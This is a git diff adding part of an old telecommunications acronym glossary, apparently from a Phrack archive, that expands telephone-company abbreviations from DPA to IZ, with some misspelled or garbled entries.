+DPA          Dispatch
+DPA          Distributed power architecture
+DPAC         Dedicated plant assignment card
+DPAC         Dedicated plant assignment center
+DPC          Destination point code (SSY)
+DPCM         Differential PCM
+DPE          Data path extender
+DPGS         Digital pair gain systems
+DPIDB        Direct PIDB
+DPIDB        Directly connected peripheral interface data bus
+DPLL         Digital phase locked loop
+DPN          Dip purge number
+DPN-PH       Data packet network-packet handler
+DPNSS        Digital private network signaling system (BT)
+DPP          Discounted payback period
+DPP          Distributed processing peripheral
+DPR          Dip report and removal
+DPSK         Differential phase shift keying
+DPSK         Differential phased-shift keying
+DPT          Data parameter testing
+DPT          Department name
+DPU          Digital patch unit
+DQ           Digital data-4 8 kb/s INTER/TRA blocal 1-26
+DQR          Design quota system report
+DQS          Design quota system
+DR           Data ready
+DR           Data receive
+DR           Deactivate request (C/I channel code)
+DR           Deactivation request
+DR           Digital data-9.6 kb/s INTER/TRA blocal 1-26
+DRAM         Digital record announcement machine
+DRAM         Dynamic ram
+DRCS         Dynamically redefinable character sets
+DRHR         Division of revenue hourly
+DRMU         Digital remote measurement unit
+DRTLRT       Dial repe tie lindal repeatie t
+DRU          DACS remote unit
+DS           Data set
+DS           Digital carrier span
+DS           Digital signal
+DS           Direct signal
+DS-0         Digital signal 0 (one channel at 64 kb/s)
+DS-0A        Digital signal at a subrate level on DS-0 for one customer
+DS-0B        Digital signals at a subrate level on DS-0 facility for one
+              or more CU
+DS-1         Digital signal level one
+DS0          Digital signal zer0
+DSBAM        Double-sideband amplitude module
+DSBLD        Disabled (default).
+DSC          Digital cross-connection systems
+DSC          Digital subscriber controller AM79C3A
+DSCT         Digital service copper transport
+DSDC         Direct service dial capability
+DSI          Digital speech interpolation
+DSIG         Direct signaling
+DSK          Disk
+DSL          Digital subscriber line
+DSL          Digital suscriber line
+DSLG         digital subscriber line group (DSLG)
+DSLINIT      DSL initialization.
+DSM          Digital switching module
+DSMX         (Ger) Digital signal multiplexer
+DSN          Defense switched network/automatic voice network
+DSN          Digital signal (level) n
+DSNE         Double shelf network equipment frame
+DSNOFC       DSN/AUTOVON office totals
+DSNTG        DSN/AUTOVON trunk group
+DSP          Digital signal processing
+DSP          Digital signal processing or digital signal processor
+DSP          Digital signal processor
+DSP          Domain specific part (ISO 7498)
+DSR          Data set ready
+DSR          Display results
+DSR          Dynamic service register
+DSRTP        Digital service remote test port
+DSS          Data station selector
+DST          Destination of order response
+DSU          Data service unit
+DSU          Data servicing unit
+DSU          Digital service unit
+DSU2         Diditalservice unit
+DSX          Digital cross-connect
+DSX          Digital signal cross-connect
+DT           DI-group terminal
+DT           Data through (C/I channel code in test mode)
+DT           Data transmit
+DT           Detect dial tone
+DT           Due time
+DT1          Data form class 1
+DTAC         Digital access connector
+DTAC         Digital test access connector
+DTAC         Digital test access connector (links SMAS and SLC-96)
+DTAM         Document transfer access and manipulation
+DTAS         Digital test access system
+DTAU         Digital test access unit
+DTC          Data test center
+DTC          Di-group terminal controller
+DTC          Digital telephone controller (ARCOFI + IBC + ICC)
+DTC          Digital trunk controller
+DTE          Data terminal equipment
+DTE          Print current date
+DTF          Dial tone first (pay phone)
+DTG          Direct trunk group
+DTIF         Digital transmission interface frame
+DTM          Data test module
+DTM          Digital trunk module
+DTMF         Dual-tone multifrequency
+DTR          Data terminal ready
+DTRK         Digital Trunks
+DTRK         Digital trunks (line and trunk)
+DTU          Di-group terminal unit
+DTU          Digital test unit
+DU           Data upstream (i.e. IOM2)
+DU           Deactivation request upstream (C/I channel code)
+DUIH         Direct user interface handler
+DUP          Data user part
+DUP          Duplicate
+DUR          Duration
+DUV          Data under voice
+DVA          Design verified and assigned
+DVX          Digital voice exchange
+DW           Digital data-56  kb/s INTER/TRA blocal 1-26
+DX           Duplex
+DY           Digital service (under 1 mb/s) INTER/TRA blocal 1-26
+DYRECT       Sides dynamic real time communication tester (in sitest)
+E            E (receive) signal lead (moreover Ear part of E&M)
+E            Equipment direction
+E            Remote trunk arrangement position subsystem (rta/pss) from troubl
+E&M          Receive & transmit/ear & mouth signaling
+E-COM        Electronic computer originated mail
+E1           Equipment system
+E800         Enhanced 800 Service
+E911         Enhanced 911
+EA           Equal access end office
+EA           Expedited data acknowledgement (SS7: in SCCP)
+EA           Extended adress
+EA           Switched acess INTER/TRA blocal 1-26
+EAAT         Equal access alternative technologies
+EADAS        Engineering and administration data acquisition system
+EADAS/NM     EADAS/network management
+EAEO         Equial access end office
+EAI          Emergency action interface
+EAP          Equal access plan
+EARN         European academic research network
+EAS          Extended announcement system
+EAS          Extended area service
+EASD         Equal access service date
+EB           Enfia ii end office trunk INTER/TRA blocal 1-26
+EBAC         Equipmentc billing accuracy control
+EBCDIC       Extended binary coded decimal interexchange code
+EBSP         EBS prefix translations
+EBSP         Enhanced business services prefix translations
+EC           ESS entity and control group number
+EC           Echo canceller
+EC           Enfia ii tandem trunk INTER/TRA blocal 1-26
+EC           Environment code
+EC           European community
+EC           Exchange carriers
+ECAP         Electronic customer access program
+ECC          Enter cable change
+ECCS         Economic c (hundred) call seconds
+ECD          Equipment configuration database
+ECDMAN       Equipment configuration database manager
+ECF          Enhanced connectivity facility
+ECL          Emitter coupled logic
+ECMA         European computer manufactueres association
+ECPT         Electronic coin public telephone
+ECR          Exchange carrier relations
+ECS          Electronic crosconnect system
+ECS          Equipment class of service
+ED           Enter date
+EDAC         Electromechanical digital adapter circuit
+EDD          Envelope delay distortion
+EDI          Electronic data interchange
+EDP          Electronic data processing
+EDSC         Electronic directory customer counts (ISDN BRCS)
+EDSX         Electronic digital signal x-connect
+EDZ          Facility emergency assignment list
+EE           Combined access INTER/TRA blocal 1-26
+EE           Initials of supervisor reviewing this ticket.
+EEC          Electronic equipment cabinet
+EECT         End-to-end call trace
+EEDP         Expanded electronic tandem switching dialing plan
+EEE          Electronic equipment enclosures
+EEHO         Either end hop off
+EEI          Equipment-to-equipment interface
+EEPROM       Electrically erasable programmable read only memory
+EF           Entrance facility-voice grade INTER/TRA blocal 1-26
+EFCTS        Electronic custom telephone service
+EFRAP        Exchange feeder route analysis program
+EG           Type #2 telegraph INTER/TRA blocal 1-26
+EIA          Electronic industries association
+EIS          Expanded inband signaling
+EISS         Economic impact study system
+EIU          Extended interface unit
+EIn          Error indication n (C/I channel code)
+EKTS         Electonic key telephone service
+EKTS         Electronic key telephone sets
+EL           Emergency reporting line INTER/TRA blocal 1-26
+ELA          Entity load analysis
+ELDS         Exchange line data service
+ELECL        Electrical
+ELEMNTS      Elements
+ELI          Electrical line interface
+EM           Emergency reporting center trunk INTER/TRA blocal 1-26
+EM           Encription module
+EM           End of medium (ASCII control)
+EMC          Electromagnetic capability
+EMC          Electromagnetic compatibility
+EME          Electromagnetic emission
+EMI          Electromagnetic interference
+EML          Expected measured loss
+EMM          Expandable mos memory
+EMS          Electromagnetic susceptibility
+EMS          Expanded memory specification
+EMSCC        Electromechanical switching control center
+EMV          EMC (german)
+EN           Entity
+EN           Entity number
+EN           Exchange network acess facility INTER/TRA blocal 1-26
+ENABL        Enable
+ENFIA        Exchange network facility for interstate access
+ENHMT        Enhancement
+ENQ          Enquiry
+ENTDT        Entered date and/or time
+EO           End office
+EOC          Embedded operation channel
+EOE          Electronic order exchange
+EOM          End of message
+EOS          Extended operating system
+EOTT         End office toll trunking
+EP           Entrance facility-program grade INTER/TRA blocal 1-26
+EP           Expedited data (SS7: in SCCP)
+EPIC         Extended PIC
+EPL          Electronic switching system program language
+EPROM        Erasable programmable read-only memory
+EPSCS        Enhanced private switched communication service
+EQ           Equalizer
+EQ           Equipment only-(network only) assignment INTER/TRA blocal 1-26
+EQPT         Equipment
+ER           Enhancement request
+ER           Error register
+ER           Exception report
+ERAR         Error return address register
+ERC          Error control (IOS)
+EREP         Environmental recording editing and printing
+ERF          Emergency restoration facility
+ERL          Echo return loss
+ERP          Effective radiated power
+ERPMP        Exception report pumper
+ERR          Error
+ERRS         Errors
+ERTS         Error rate test set
+ERTS         Error rate test sets
+ERU          Error return address update
+ES           Extension service-voice grade INTER/TRA blocal 1-26
+ESAC         Electronic systems assistance center
+ESAP         Emergency Stand-Alone prefix
+ESAP         Emergency stand-alone prefix
+ESB          Emergency service bureau
+ESC          Enhanced speech circuit
+ESC          Escape (ASCII control)
+ESC          Three way calling USOC
+ESCC2        Extended high level serial communication controller
+ESCC8        Like ESCC2
+ESD          Electrostatic discharge
+ESD          Extened super framing
+ESF          Extended super frame
+ESF          Speed calling USOC
+ESFF         Extended superframe format
+ESL          Emergency stand-alone
+ESL          Essental service
+ESL          Speed calling 8 code USOC
+ESM          Call forwarding USOC
+ESM          Economic study module
+ESMTC        Electronic system maintance
+ESN          Electronic serial number (Cell)
+ESN          Electronic switched network
+ESN          Emergency service number
+ESP          Enhanced service procider
+ESP          Enhanced service providers
+ESP          Essential service protection
+ESP          Print entire summary table
+ESS          Electronic switching system
+ESSX         Electronic switching systen exchange
+EST          Established
+ESTAB        Establish
+ESX          Call waiting USOC
+ET           Entrance facility-telegraph grade INTER/TRA blocal 1-26
+ET           Exchange termination
+ETAS         Emergency technical assistance
+ETB          End of transmission block
+ETC          Estimated trunk ccs value
+ETF          Electronic toll fraud
+ETL          Equipment test list
+ETN          Electronic tandem network
+ETRI         Electronics and telecommunications research institute (ROK)
+ETS          Electronic tandem switching
+ETS          Electronic translation systems
+ETSACI       Electronic tandem switching adminstration channel interface
+ETSSP        ETS status panel
+ETX          End of text
+EU           End user
+EU           Extension service-telegrasph grade INTER/TRA blocal 1-26
+EUPOT        End user-point of termination
+EV           Enhanced emergency reporting trunk INTER/TRA blocal 1-26
+EV           Expected value
+EVB          Busy call forward USOC
+EVC          Bust call forward extended USOC
+EVD          Delayed call forward USOC
+EVD          Delayed call forwarding
+EVST         (Ger) End exchange
+EW           Off network MTS/WATS equivalent service INTER/TRA blocal 1-26
+EWSD         (Ger) Electronic dialing system (digital)
+EX           Exercise
+EXD          ECS crossloading option
+EXD          Extra digit
+EXD          Extra digit (MDII)
+EXP          Extra pulse
+EXP          Extra pulse (MDII)
+EXT          Extension
+EXTC         Expenditure type code
+F            Facility direction
+F            Fault (indicator)
+F            Office or base unit from trouble report.
+F1           Facility system
+FA           Frame aligner
+FA           Fuse alarm
+FAA          Facility accepted (SS7 in ISUP)
+FAC          Facility
+FAC          Facility Assiment Center
+FACD         Facility changed msg.
+FACS         Facilities assignment and control system
+FADS         Dorce administration
+FANALM       Fan alarm
+FAP          Facilities analysis plan
+FAR          Facility request (SS7: in ISUP)
+FAR          Federal acquisition regulation
+FAS          Frame alignment signal
+FAST         First application system test
+FAT          File allocation table
+FAX          Faximile
+FC           Feature control
+FC           Frame control
+FC           From cable
+FC/EC        Function code and environment code
+FCA          Final closure abandon (MDII)
+FCAP         Facility capacity
+FCC          Federal communications commission
+FCC          Forward command channel
+FCC          Frame control center
+FCD          Frame comtinuity date
+FCG          False cross or ground
+FCS          File control systemction
+FCS          Frame check sequence
+FD           Private line-data INTER/TRA blocal 1-26
+FDD          Frame due date
+FDDI         Fiber distributed data interface (x3t9.5)
+FDI          Feeder/distribution interfaces
+FDM          Frequency division multiplex
+FDM          Frequency-division multiplexing
+FDMA         FDM access
+FDP          Field development program
+FDT          Frame due time
+FDX          Full duplex
+FDY          Set fiscal day for LAC
+FEA          Custom calling feature/PIC
+FEA          Customer feature
+FEAT         Feature
+FEAT         Features
+FEBE         Far end block error (IOM2 monitor message)
+FEC          Forward error correction
+FECC         Front end communication computer
+FED          Far end data
+FELP         Far end loop process
+FEMF         Foreign electro-motive force
+FEPS         Facility and equipment planning system
+FEV          Far end voice
+FF           Check appropriate space where trouble is located
+FF           Form feed
+FG           Group-supergroup spectrum INTER/TRA blocal 1-26
+FGA          Feature group A
+FGB          Feature group B
+FGC          Feature group C
+FGD          Feature group D
+FGE          Feature group E
+FGK          Feature group K (ISDN Q.931)
+FIB          Forward indication bit (SS7)
+FID          Field indentifiers
+FIFO         First in
+FIFO         First in first out (storage)
+FIL          Filter
+FIN          Facility information msg.
+FIOC         Frame input/output controller
+FIP          Facility interface processor
+FIPS         Federal information processing standards
+FISU         Fill in signal unit (SS7)
+FITL         Fiber in the loop
+FJ           Frame jump (C/I channel code)
+FKP          False key pulse
+FKP          False key pulse (MDII)
+FL           Fault locate
+FL           Fault location
+FLA          Flag
+FLD          Field
+FLEXCOM      Fiber optic communication
+FLR          Frame layout report
+FLT          Flat
+FM           Frequency modulation
+FM01         DCT alarm activated or retired - 1AESS
+FM02         Possible failure of entire bank not just frame - 1A
+FM03         Error rate of specified digroup - 1AESS
+FM04         Digroup out of frame more than indicated - 1AESS
+FM05         Operation or release of the loop terminal relay-1AESS
+FM06         Result of digroup circuit diagnostics -1AESS
+FM07         Carrier group alarm status of specific group - 1AESS
+FM08         Carrier group alarm count for digroup - 1AESS
+FM09         Hourly report of carrier group alarms - 1AESS
+FM10         Public switched digital capacity failure - 1AESS
+FM11         PUC counts of carrier group errors - 1AESS
+FMAC         Facility maintance administration center
+FMAC         Facility maintenance and control
+FMC          Force management center
+FMM          Finite message machine
+FN           Feature number
+FN           File name
+FNBE         Far and near end block error (IOM2 monitor message)
+FNPA         Foreign numbering plan area
+FOA          First office application
+FOC          Fiber optic communications
+FON          Fiber optics network
+FOR          Frame order report
+FORPOT       Foreign potential.
+FOS          Frame operations summary
+FOS-ALC      Fiber optic systems maintance - Alcatel
+FOS-ROCK     Fiber optic system maintance - Rockwell
+FOT          Forward transfer (SS7: in ISUP)
+FP           Functional protocol
+FPC          Foundation peripheral controller
+FPC          Frequency comparison pilots
+FPS          Fast packet switching
+FR           Fire dispatch INTER/TRA blocal 1-26
+FR           Fixed resistance
+FR           Flat rate
+FRAC         Frame aligner circuit
+FRC          Forced request configuration
+FREQ         Frequency
+FRJ          Facility rejected msg. (SS7 in ISUP)
+FRMR         Frame reject (LAP-D response)
+FRPS         Field reliability performance studies
+FRQ          Facility request message
+FRS          Flexible route selection
+FS           File separator
+FS/SYM       Function Schematic/Symbol Numbers (1AESS Test access)
+FSA          False start abandon
+FSA          False start abandon on incoming trunk
+FSC          Frame synchronization clock (i.e. IOM2)
+FSK          Frequency shift keying
+FSN          Forward sequence number
+FT           Foreign exchange trunk INTER/TRA blocal 1-26
+FT           Frame time
+FTA          Frame transfer analysis
+FTC          Frame transfer completion
+FTE          Frame transfer establishment
+FTG          Final trunk group
+FTL          Frame transfer lets
+FTP          File transfer protocol
+FTR          Frame transfer reprint
+FTS          Federal telecommunications system
+FTW          Frame transfer withdrawal
+FUNCS        Functions
+FV           Voice grade facility INTER/TRA blocal 1-26
+FW           Wideband channel INTER/TRA blocal 1-26
+FWD          Forward
+FWM          Frame work management
+FWS          Frame work station
+FX           Foreign exchange
+FX           Foreign exchange INTER/TRA blocal 1-26
+FXO          Foreign exchange circuit office direction
+FXS          Foreign exchange circuit station direction
+G            Spare box.  use for special studies.
+GAP          (Ec) group of analysis and provision (for ONP)
+GB           Great britain
+GBS          Group bridging service
+GC           Group card
+GCE          Gated Oscillator Error
+GCI          General circuit interface (IOM/u(k0)-interface)
+GCON         Generic conditions
+GCP          Generate Control pulse
+GCR          General configuration register
+GCS          Group control system
+GDSUCOM      Global DSU common
+GDSUCOM      Global digital service unit common
+GDX          Gated diode crosspoint
+GDXACC       Gated diode crosspoint access
+GDXC         Gated diode crosspoint compensator
+GDXCON       Gated diode crosspoint control circuit
+GEISCO       General electric information services company
+GFR          General facility report
+GG           Getails of reported trouble.
+GH           Gain hit
+GHZ          Gigahertz
+GID          Group ID
+GKCCR        Generated key collection and compression routine
+GLA          Generate lists for assignment
+GND          Ground
+GNS          Gainslope
+GNS          Gainslope test (SARTS command)
+GOC          General order control (TIRKS)
+GOS          Grade of service
+GP           Group processor
+GPA          Gas pressure alarm
+GPIB         General purpose interface bus
+GPPC         General purpose power controller
+GPS          Global positioning system
+GR           General requirments (BellCoRe)
+GRA          GRS acknowledgement
+GRASP        Generic access package
+GRD          Ground fault.
+GRD          Ground.
+GRID         Line unit grid.
+GRP          Group
+GRP MOD      Group modulator
+GRS          Circuit group reset (SS7: in ISUP)
+GS           Ground start (on-hook normal)
+GS           Group separator
+GSA          General services administration
+GSAT         General telephone and electronics satellite corporation
+GST          Ground start signaling
+GSZ          Group size
+GTC          General telephone company
+GTE          General telephone electronics
+GTEI         Global tei
+GTS          Gamma transfer service
+GTT          Global title transmission
+GWY          Gateway
+Ger          German
+H            Hold state (in EOC)
+H            Hours
+H            Trouble ticket number.  subparagraph 5.6.4.
+H&D          High and dry (trunk test)
+H-           High-
+H-RAP        Hardware reliability assurance program
+HAC          Hands-free add-on circuit (for speakerphone)
+HBS          Hunt group blocks of spares
+HC           High capacity 1.544 mb/ps-service code for LATA access
+HC           Hunt count
+HCDS         High capacity digital service
+HCDS         High-capacity digital services
+HCFE         High-capacity front end
+HCSDS        High-capacity satellite digital service
+HCTDS        High-capacity terrestrial digital service
+HD           High capacity 3.152 mb/ps-service code for LATA access
+HDB3         High-density bipolar 3 (cept PRI)
+HDFI         HSM digital facilities interface
+HDLC         High level DLC
+HDLC         High-level data link control
+HDSL         High bit-rate digital subscriber line
+HDTV         High definition television  (soon to be the new buzz word!!)
+HDW          Hardware
+HDX          Half duplex
+HE           High capacity 6.312 mb/ps-service code for LATA access
+HEAP         Home energy assistance program
+HEHO         High end hop off
+HF           High capacity 6.312-service code for LATA access
+HF           Hunt-from telephone number
+HFCC         High capacity facility control center
+HFR          Hardwara failure rate
+HG           High capacity 274.176 mb/s-service code for LATA access
+HGBAF        Hardware group blocking acknowledgment failure
+HGR          Hunt group report
+HGS          Hunt group summary
+HGUAF        Hardware group unblocking acknowledgment failure
+HH           History header
+HH           Record of repair activity.
+HI           High
+HI           High impedance (C/I channel code)
+HI           Highway interrupt
+HIC          Hybrid integrated circuit
+HIM          Host interface module
+HIS          Hunting ISH
+HK           Hook
+HL IT        Siemens semiconductors (hl)
+HLC          Highest lead factor group count
+HLDG         Holding
+HLLAPI       High level language application program interface
+HLSC         High-level service circuits
+HM1          Intercom plus  USOC
+HMCL         Host message class assignment
+HMP          Intercom plus
+HNPA         Home numbering plan area
+HNS          Hospitality network service
+HOBIC        Hotel billing information center
+HOBIS        Hotel billing information system
+HOLD         Call hold (i.253 b)
+HP           Hewlett-packard
+HP           Non-DDS digital data 2.4 kb/s INTER/TRA blocal 1-26
+HPO          High performance option
+HQ           Non-DDS digital data 4.8 kb/s INTER/TRA blocal 1-26
+HR           Hour
+HR           Non-DDS digital data 9.6 kb/s INTER/TRA blocal 1-26
+HRS          Hours prefix
+HS           High capacity subrate-service code for LATA access
+HSCC         High level serial communication controller   sab82520
+HSCX         Extended hscc     sab82525
+HSM          Host switching module
+HSSDS        High-speed switched digital service
+HT           Horizontal tabulator
+HT           Hunt-to telephone number
+HTI          Highway transfer interrupt
+HU           High usage
+HU           High-usage trunk
+HUNT         Hunting
+HUTG         High usage trunk group
+HW           High and wet.
+HW           High-and-wet
+HW           Non-DDS digital data 56  kb/s INTER/TRA blocal 1-26
+HW           Pcm highway
+HZ           Hertz
+I            Cable and pair or associated equipment
+I            Information (LAP-D command)
+I            Installation
+I            Invalid
+I&I          Investment and inventory
+I&M          Customer services installation and maintenance
+I&M          Installation & maintenance
+I-           Information (numbered i-frames)
+I/O          Ineffective other
+I/O          Input/output devices
+I/O          Tnput/output
+I0           Feature removed
+I1           Added feature
+IA           Immediate action
+IA           Ineffective attempts
+IAA          Ineffective attempt analysis.
+IAAN         Immediatel action report
+IAC0         DLI 0 access error
+IAC1         DLI 1 access error
+IACS         Intergrated access cross-connected system
+IAD          Incomplete address detected (incoming)
+IAM          Initial address msg. (SS7: in ISUP)
+IB           Instruction buffer
+IBC          ISDN burst transceiver circuit
+IBN          Integrated business network
+IBROFC       ISDN BRCS and Analog Office totals
+IC           Incoming call (x.25)
+IC           Independent carrier
+IC           Installation centers
+IC           Inter-LATA carrier
+IC           Inter-exchange carrier
+IC           Interexchange carriers
+IC/MC        Installation and maintence centers
+ICA          Incoming advance
+ICA          Incoming advance (MDII)
+ICAN         Individual circuit analysis
+ICAO         International civil aviation organization
+ICC          ISDN communications controller
+ICC          Interstate commerce commission
+ICCU         Inmate call control unit
+ICD          Interactive call distribution
+ICL          Intra-RSM communication link
+ICLID        Individual calling line id
+ICM          Integrated call management
+ICN          Interconnecting network
+ICOM         (taiwan) integrated communication
+ICOT         Intercity and outstate trunk
+ICP          Intercept
+ICPOT        Interexchange carrier-point of termination
+ICSC         Inter-LATA customer service center
+ICSC         Interexchange carrier service center
+ICSC         Interexchange customer service center
+ICUG         International closed user groups
+ICUP         Individual circuit usage and peg count
+ICUR         Individual circuit usage recorder
+ID           Idle control code
+IDA          (gb) interated digital access (b64+b8+d8)
+IDC          Information distribution companies
+IDCI         Interim defined central office interface
+IDCU         Integrated digital carrier unit
+IDCU         Integrated digital carrier unit .
+IDCU         Integrated digital carrier unit i.e. AT&T Series 5 RT FP 303G
+IDDD         International direct distance dialing
+IDEC         ISDN d-channel exchange controller
+IDF          Intermediate distributing frame
+IDI          Initial domain identifier (ISO 7498)
+IDLC         Integrated digital loop carrier
+IDLC         Intergrated digital loop carrier
+IDP          Individual dialing plan
+IDPC         Integrated data protocol controller
+IDS          Internal directory system
+IDVC         Integrated data/voice channel
+IEC          ISDN echo cancellation circuit
+IEC          Interexchange carrier
+IEC          International electrotechnical comission
+IEC-P        (old name of iec-q3)
+IEC-Q1       Iec for 2b1q  peb2091
+IEC-Q2       Iec-q specially for lt and NT1 (without microprocessor)
+IEC-Q3       Iec-q with parallel processor interface (i.e. for daml)
+IEC-T        Iec for 4b3t  peb2090
+IEEE         Institute of electrical and electronics engineers
+IEPC         ISDN exchange power controller
+IF           Intermediate frequency
+IFAC         Integrated digital carrier unit facility
+IFRB         International frecuency registration board
+IFRPS        Intercity facility relief planning system
+IFS          (switzerland) integrated telecom service
+IGS          Idenitfy graphic subrepertoire (teletex)
+IIN          Integrated information network
+IJR          Input a jeopardy reason
+ILC          ISDN link controller
+ILINE        IDCU line counts.
+IM           Input mux
+IM           Interface module
+IMA          Additional ineffective machine attempts
+IMAS         Integrated mass announcement system
+IMC          IOS mailbox control
+IMCAT        Input message catalog
+IMCF         Interoffice multiple call forwarding
+IMD          Intermodulation distortion
+IMM          Input message manual
+IMMU         IOS memory management unit
+IMP          Impedance
+IMP          Impules per minute
+IMP          Interpersonal messaging protocol (x.420: p2)
+IMS          Interprocessor message switch
+IMT          Inter-machine trunk
+IMTS         Improved mobile telephone service
+IMU          Input measured ccs usage data
+IN           Intelligent network
+IN/1         Intelligent network/1
+INA          Intergrated network access
+INAP         Intelligent network access point
+INC          Incoming trunk groups
+INC          International calling
+INC          International carrier
+INC SEL      Incoming selector
+INCAS-A      Integrated network cost analysis - access
+INCAS-LT     Integrated network cost analysis - local and toll
+INCAS-S      Integrated network cost analysis - shared
+INCAS/E      Integrated network cost analysis system
+INCAS/I      Integrated network cost analysis system - embedded
+INCIS        Integrated network cost information system
+INCP         Incomplete
+IND          Individual
+INF          Information
+INF          Information (SS7: in ISUP)
+INIT         Allocation table initalization
+INL          Inter node link
+INN          Inter node network
+INQ          Complete circuit inquiry
+INR          Information request (SS7: in ISUP)
+INS          (japan) information network system (b64+b16+d8)
+INT          Interrupt (i.e. C/I channel code)
+INTCCTRL     International code control (NTI)
+INTCHG       Interexchange
+INTEGRIS     Integrated results information service
+INTELSAT     International telecommunications satellite consortium
+INTR         Interrupt
+INW          INWATS [code 258(8000-8299)]
+INWATS       Inward wide area telecommunications system
+INWATS       Inward wide area telephone service
+INWBLKD      INWATS returned blocked
+INWBLKD      Inward wide area telecommunications service (INWATS) returned
+              blocked
+INWBUSY      INWATS all lines busy
+INWCCBL      INWATS code control blocked
+INWDBOV      INWATS data base overload
+INWDBTO      INWATS data base timeout
+INWDSBL      INWATS direct signaling blocked
+INWNNPA      INWATS nonpurchased NPA
+INWNNPA      INWATS nonpurchased numbering plan area (NPA)
+INWNOXL      INWATS returned no translation
+INWONPA      INWATS invalid ONPA
+INWONPA      INWATS invalid originating numbering plan area (ONPA)
+INWOVLD      INWATS returned overload
+INWUNEQ      INWATS returned unequipped
+INWVLIN      INWATS vacant line number
+INWVNXX      INWATS vacant NXX
+IO           Inward operator
+IOAU         Input/output access unit (univac)
+IOC          Independent operating company
+IOC          Input/output controler (shelf)
+IOC          Integrated optical circuit
+IOC          International overseas center
+IOCC         International overseas completion center
+IOCP         Input/output configuration process
+IOCS         Input/output control system
+IODB         IDCU on-demand B-channel
+IOI          Secondary input/output interface pack(s)
+IOM          ISDN-oriented modular (architecture and interfaces)
+IOM2         Extended iom
+IOMI         Input/output microprocessor interface
+IOP          Input-output processor
+IOP          Input/output Processor
+IOP          Input/output driver
+IOP          Input/output processor
+IOS          ISDN operational software
+IOS          Input/output supervisor (IBM)
+IOS          Inventory order system
+IOSF         Input/output shelf assignment
+IOT          Inter-office trunk
+IOT          Interoffice test command (SARTS command)
+IOT          Interoffice testing
+IOTC         International originating toll center
+IP           Information provider
+IP           Inprogress
+IP           Intermediate point
+IP           Internet protocol
+IPABX        ISDN pabx
+IPAC         ISDN pc adapter circuit
+IPACS        Interactive planning & control system
+IPAT         ISDN primary access transceiver
+IPB          Sipb
+IPBC         IOM2 PBC (old name for EPIC)
+IPC          Inter-process communication
+IPC          Interprocess communication
+IPCS         IOS process control system
+IPCS         Installation product costing system
+IPCS         Interactive problem control system
+IPIB         Intelligent personal computer interface board
+IPIDB        IDCU peripheral interface data bus
+IPL          Initial program load
+IPL          Interoffice private line signaling
+IPL          Interoffice private line signaling test (SARTS command)
+IPLAN        Integrated planning and analysis system
+IPLS         InterLATA private line services
+IPM          Impulse per minute
+IPM          Impulses per minute
+IPM          Interruptions per minute
+IPP          IOS protocol part
+IPP          Integrated planning process
+IPPC         Interdepartmental project planning committee
+IPR          Installation performance results system
+IPS          Installation performance results
+IPS          Integrated Provisioning System
+IPS          Integrated provisions system
+IPX          Integrated packet exchange
+IQS          Instant request system
+IR           Incoming register
+IRBR         Integrated resource billing report system
+IRC          International record carrier
+IRIS         Industry relations information system
+IRLF         Incoming register link frame
+IRM          Information resource management
+IRMC         Incoming register marker connector
+IRO          Industry relations operations
+IROR         Internal rate of return
+IRP          Integrated revenue planning
+IRPC         ISDN remote power control   psb2120
+IRR          Internal rate of return system
+IRRS         Interactive request and retrieval system
+IRS          Industrial revenue summary
+IRT          IDCU remote digital terminal
+IRU          Integrated recovery utility (sperry)
+IS           Interrupt set
+IS/SADQ      Interstate special access demand quantification
+ISA          Indicate status application
+ISAC-P       ISDN subscriber access controller
+ISAC-S       ISDN subscriber access controller
+ISAM         Indexed sequential access method
+ISC          Intelligent serial controller
+ISC          International switching center
+ISC          Planintercompany services coordination plan
+ISC/TE       Information systems center for technical education
+ISCAR        Information systems costs analysis reports
+ISCOM        SWBT intercompany service coordination (ISC) order monitor
+ISCP         Integrated service control point
+ISCP/MSAP    ISCP/multi-service application platform
+ISCP/SPOCK   ISCP/service provisioning and on-line creation tool kit software
+ISDN         Integrated services digital network
+ISF          Inquire on a single facility
+ISG          Isolated system grounding
+ISH          Complete circuit inquiry short
+ISI          Industry support layout
+ISIS         Interstate settlements information system
+ISLM         Integrated services line module
+ISLU         Integrated services line unit
+ISLUCC       Integrated services line unit common controller
+ISLUCD       Integrated services line unit common data
+ISLUHLSC     Integrated services line unit high level service circuit
+ISLUMAN      Integrated services line unit metallic access network
+ISLURG       Integrated services line unit ringing generator
+ISM          ISDN switching module
+ISM          Interactive synchronous mode
+ISMP         Industry specific measurement plan
+ISMS         Integrated service management system
+ISMTL        Information systems management training
+ISN          Information systems network
+ISN          Integrated systems network
+ISNET        Interim solution network (Kansas city only)
+ISO          Information systems organization
+ISO          International organization for standardization
+ISOFC        ISDN office totals
+ISOPDB       Information systems organization planning data base
+ISOSS        Intercompany service order switching system
+ISP          Intermediate service part
+ISPBX        Integrated systems PBX
+ISPC         International signaling point code (SS7)
+ISPF         Interactive system productivity facility
+ISPI         ISDN packet interface
+ISRP         Information systems rules panel
+ISS          Integrated switching system
+ISS          Issue
+ISSANRC      Interstate special access non-recurring
+ISSC         Interfunction special service coordination
+ISSCO        Intertoll
+ISSN         Integrated special services network
+ISSN         Intergrated specal services network
+ISSS         ISDN supporting system
+ISTA         Interrupt status register
+ISUP         ISDN user part
+ISUP         ISDN user part (SS7: q.76x)
+ISUP         Integrated services user part
+IT           Inactivity test (SS7: in SCCP)
+IT           Intertandem tie trunk INTER/TRA blocal 1-26
+ITAC         ISDN terminal adaptor circuit
+ITC          Independent telephone company
+ITC          Interdepartmental training center at dallas-texas for
+ITD          Intertoll dial
+ITEA         Interoffice trunks engineering and administration
+ITF          Integrated test facility
+ITG          Intergrated traffic generator
+ITIMS        Integrated transportation information management system
+ITIMS/IE     Itims/information expert
+ITM          Cable pair item number
+ITNA         Improves thrid number acceptance
+ITNO         Item number
+ITS          Institute of telecommunication science
+ITS          Integrated test system
+ITS          Interactive training system
+ITSE         Incoming trunk service evaluation
+ITSO         Incoming trunk service observation
+ITSTC        Information technology steering committee (cen
+ITT          Idle trunk test
+ITU          International telecommunication union
+ITU          International telecommunications union
+ITVSE        Intermediary transport vendor service center
+ITW          Instructional technology workshop
+IU           Network/port interface unit
+IUP          Installed user program (IBM)
+IVD          Integrated voice data
+IVP          Installation verification procedures
+IVP          Installation verification program
+IVTS         International video teleconferencing service
+IWF          Interworking facility (gateway)
+IWU          Interworking unit (gateway)
+IX           Interactive executive
+IXC          Or icinterexchange carrier
+IXM          Interexchange mileage
+IZ           Interzone
diff --git a/phrack43/23.txt b/phrack43/23.txt
new file mode 100644
index 0000000..2d4d18f
--- /dev/null
+++ b/phrack43/23.txt
@@ -0,0 +1,1031 @@
